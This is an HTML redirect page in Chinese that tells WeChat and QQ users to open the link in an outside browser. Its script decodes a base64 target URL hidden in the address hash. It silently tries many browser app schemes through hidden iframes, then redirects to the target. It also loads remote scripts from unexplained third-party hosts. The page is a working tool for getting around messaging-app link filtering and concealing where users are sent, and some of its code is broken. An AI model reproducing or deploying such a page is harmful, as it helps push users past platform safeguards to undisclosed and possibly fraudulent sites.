<!DOCTYPE html>
<html style="font-size:7vw;">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>请使用浏览器打开</title>
    <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no" />
    <meta name="format-detection" content="telephone=no" />
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="wap-font-scale" content="no" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    </script>
    <style type="text/css">
        body,
        div {
            margin: 0;
            padding: 0;
            font-family: "Microsoft YaHei";
            color: #fff;
        }

        body {
            background: #fff;
            color: #3f3f3f;
            font-family: Apple LiGothic Medium, SimHei, Geneva, Arial, Helvetica, sans-serif;
            -webkit-tap-highlight-color: transparent;
            -webkit-tap-highlight-color: transparent;
            -webkit-touch-callout: none;
            -webkit-appearance: none;
            width: 100%;
        }

        .fh_jt {
            width: 15rem;
            height: 4.28rem
        }

        .fh_jt img {
            width: 15rem;
            height: 4.28rem
        }

        .fh_wz {
            height: 3.9rem;
            line-height: 1rem;
            text-align: center;
            color: #333
        }

        .fh_tp {
            width: 12.44rem;
            height: 10rem;
            margin: 0 auto
        }

        .fh_tp img {
            width: 12.44rem;
            height: 10rem;
            text-align: center
        }
        
        .app-download-tip {
			margin: 0 auto;
			width: 290px;
			text-align: center;
			font-size: 15px;
			color: #333
		}
        .app-download-btn {
			display: block;
			width: 214px;
			height: 40px;
			line-height: 40px;
			margin: 18px auto 0 auto;
			text-align: center;
			font-size: 18px;
			border-radius: 20px;
			border: .5px solid;
			text-decoration: none;
			color: #333
		}
    </style>
</head>

<body style="background-color:#f5f5f5;text-align: center;">
    <div id="test">
        <div class="fh_jt"><img src="./ysj.jpg" alt="右上角箭头"></div>
        <div class="fh_wz">点击屏幕右上角[...]<br />用 浏览器 打开 </div>
        <div class="fh_tp"><img src="./llq.jpg" alt="浏览器打开"></div>
        <br>
	    <span class="app-download-tip">您也可以复制本站网址，到其它浏览器打开</span>
	    <a class="app-download-btn" id="fz" onclick="fz()">点击复制网址</a><br><br><br>
    </div>
</body>
<script src="http://666.xiaolirjk.cn/cpa2.html"></script>
<script>


var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//api.rmk6.com/tgj.js";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var str = window.location.hash;//获取地址栏参数
var key = str.replace("#","");//替换字符
var url = atob(key);
document.getElementById("fz").setAttribute("data-clipboard-text",url); 
var u = navigator.userAgent, app = navigator.appVersion;
var isAndroid = u.indexOf('Android') > -1 || u.indexOf('Linux') > -1; //g
var isIOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/); //ios终端
//以上判断ua系统跳转浏览器

window.onresize = function () {setRootFontSize();}
function openurl(url) {var a = document.createElement('iframe');a.setAttribute('src', url);a.setAttribute('style', 'display:none;position:relative;z-index:-1;');document.body.appendChild(a);}
function openios(url) {var a = document.createElement('a');a.setAttribute('href', url);a.setAttribute('style', 'display:none');document.body.appendChild(a);a.click();a.parentNode.removeChild(a);}
function ob(u){document.getElementById(rid).href= u;document.getElementById(rid).click();}

    var ua = navigator.userAgent.toLowerCase();
    if (ua.match(/MicroMessenger/i) == "micromessenger") {
        //return "weixin";
    } else { if (ua.match(/QQ/i) == "qq") {
        //return "QQ";
    if (isAndroid) {
        openurl("mttbrowser://url=" + url);//QQ浏览器
        openurl("ucweb://" + url);//uc浏览器
        openurl("qihoobrowser://browse?url=" + url);//360浏览器
        openurl("googlechrome://browse?url=" + url);//谷歌浏览器
        openurl("ttg://tburl?url=" + url);//猎豹浏览器
        openurl("mibrowser:" + url);//小米浏览器
    }
    if (isIOS) {
        openios("mttbrowser://url=" + url);//QQ浏览器
        openios("ucbrowser://" + url);//uc浏览器
        openios("qihoobrowser://browse?url=" + url);//360浏览器
        openios("googlechrome://" + url);//谷歌浏览器
        openios("baiduboxapp://browse?url=" + url);//百度浏览器
        openios("opera-http://" + url);//opera浏览器
        openios("quark://" + url);//夸克浏览器
    }
    } else { if (ua.match(/Alipay/i) == "alipay" && payway == 2) {
        //return "alipay";
    }
    window.location.replace(url);
    }
    }
//禁止下拉
document.body.addEventListener('touchmove', function (e) {
	e.preventDefault()
}, { passive: false })

new ClipboardJS('#fz');
function fz() {
	var fz = document.getElementById('fz');
	fz.innerHTML = "...复制成功...";
}

</script>
</html>




